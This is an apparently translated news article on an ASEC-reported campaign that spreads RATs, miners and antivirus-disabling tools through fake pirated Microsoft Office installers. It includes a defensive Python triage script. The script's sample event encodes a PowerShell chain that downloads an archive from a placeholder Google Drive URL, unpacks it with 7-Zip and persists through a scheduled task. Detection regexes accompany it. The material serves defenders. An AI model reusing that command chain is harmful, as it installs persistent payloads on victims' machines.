Distribution of malware via counterfeit copies of Microsoft Office
Malware campaign analysis using counterfeit installers of popular software
A malware campaign delivers malware through pirated software, using fake Microsoft Office installers as the lure. The download URLs point to legitimate services, which makes them hard to flag. The malware delivered includes RATs, cryptocurrency miners and antivirus evasion tools.
The AhnLab Security Intelligence Center (ASEC) has revealed a new malicious campaign targeting users looking for pirated versions of popular software such as Microsoft Office, Windows, and Hangul Word Processor. Hackers exploit fake Microsoft Office installers, tricking victims with a well-designed interface that allows them to choose between different versions, languages, and 32-bit or 64-bit architectures. Behind this facade, various types of malware are hidden, including RATs, cryptocurrency miners, droppers, proxies and antivirus evasion systems. The fake installer launches obfuscated .NET malware, which connects to messaging channels such as Telegram or Mastodon to obtain a genuine download URL.
Malware distribution methodology
The distributed URLs point to legitimate services such as Google Drive or GitHub, making it harder for antivirus products to flag them. The payloads are base64 encoded and contain PowerShell commands that unpack the different malware strains with 7-Zip. Among the components identified is a malware called "Updater", which uses the Windows Task Scheduler to keep the threats persistent even after a system restart. This technique lets the attackers maintain continuous access to the compromised system and makes it difficult for victims to fully clean their devices once infected.
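As an added example (not code from ASEC or from the campaign itself), the following triage script shows how a defender can surface the chain described above in process-creation telemetry: it decodes the base64 payload of an encoded PowerShell command line and checks the decoded script for a download from a legitimate host, a 7-Zip extraction and a scheduled-task creation. The log events, the encoded script and the Google Drive URL are constructed placeholders, not indicators from the report.

```python
import base64
import re

def _enc(script: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the script as UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

# Constructed process-creation events, formatted "<pid> <image> <command line>".
# Event 2 mimics the chain above: fetch an archive, unpack it, persist via a task.
SAMPLE_EVENTS = [
    "4120 C:\\Windows\\explorer.exe explorer.exe",
    "5216 C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell.exe -nop -w hidden -enc "
    + _enc("iwr https://drive.google.com/uc?id=PLACEHOLDER_ID -OutFile $env:TEMP\\p.7z; "
           "& 7z.exe x $env:TEMP\\p.7z -o$env:APPDATA\\u -y; "
           "schtasks /create /tn Updater /tr $env:APPDATA\\u\\Updater.exe /sc onlogon"),
    "6001 C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe powershell.exe -Command Get-Date",
]

# Any unambiguous prefix of -EncodedCommand is accepted by powershell.exe.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

# Indicators drawn from the described chain; each regex runs over the decoded script.
INDICATORS = {
    "legit_host_download": re.compile(r"(?i)\b(drive\.google\.com|github\.com|raw\.githubusercontent\.com)\b"),
    "sevenzip_extract": re.compile(r"(?i)\b7z(?:\.exe)?\s+x\b"),
    "schtask_persistence": re.compile(r"(?i)\bschtasks(?:\.exe)?\s+/create\b"),
}

def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_event(event: str) -> dict:
    """Decode any encoded PowerShell in the event and list the chain indicators it contains."""
    pid, _image, cmdline = event.split(" ", 2)
    decoded = decode_encoded_command(cmdline)
    text = decoded if decoded is not None else cmdline
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if decoded is not None:
        hits.insert(0, "encoded_powershell")
    return {"pid": int(pid), "decoded": decoded, "indicators": hits}

def triage(events) -> list:
    """Keep only events with at least two indicators, i.e. those resembling the full chain."""
    return [r for r in (analyze_event(e) for e in events) if len(r["indicators"]) >= 2]
```

Running `triage(SAMPLE_EVENTS)` returns only the encoded event (pid 5216) with all four indicators; a plain `-Command Get-Date` invocation is not reported.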
Types of malware involved
ASEC research identified various types of malware installed via this campaign. Among these, Orcus RAT is a remote access Trojan that allows total control of the system, with keylogging functions, webcam access and other exfiltration capabilities. XMRig is a cryptocurrency miner that leverages system resources to mine Monero, suspending mining during heavy resource use to avoid suspicion. 3Proxy turns infected systems into proxy servers, allowing attackers to route malicious traffic. PureCrypter downloads and executes additional malicious payloads, ensuring continued infection. Finally, AntiAV disables security software, manipulating its configuration files to prevent it from working properly and leaving the system vulnerable.
Implications and advice for users
This strategy of infection through pirated software is not new but remains effective, as demonstrated by the spread of the STOP ransomware, currently one of the most active ransomware operations targeting consumer users. Pirated programs lack digital signatures, and users tend to ignore security warnings because they know they are using unofficial material. This behavior, combined with graphical discrepancies that are easy to overlook, makes pirated files an ideal vector for malware infections. You are strongly advised to avoid downloading and installing pirated software and to always use authentic, up-to-date versions of programs to avoid security compromises.
06/02/2024 08:31
Marco Verro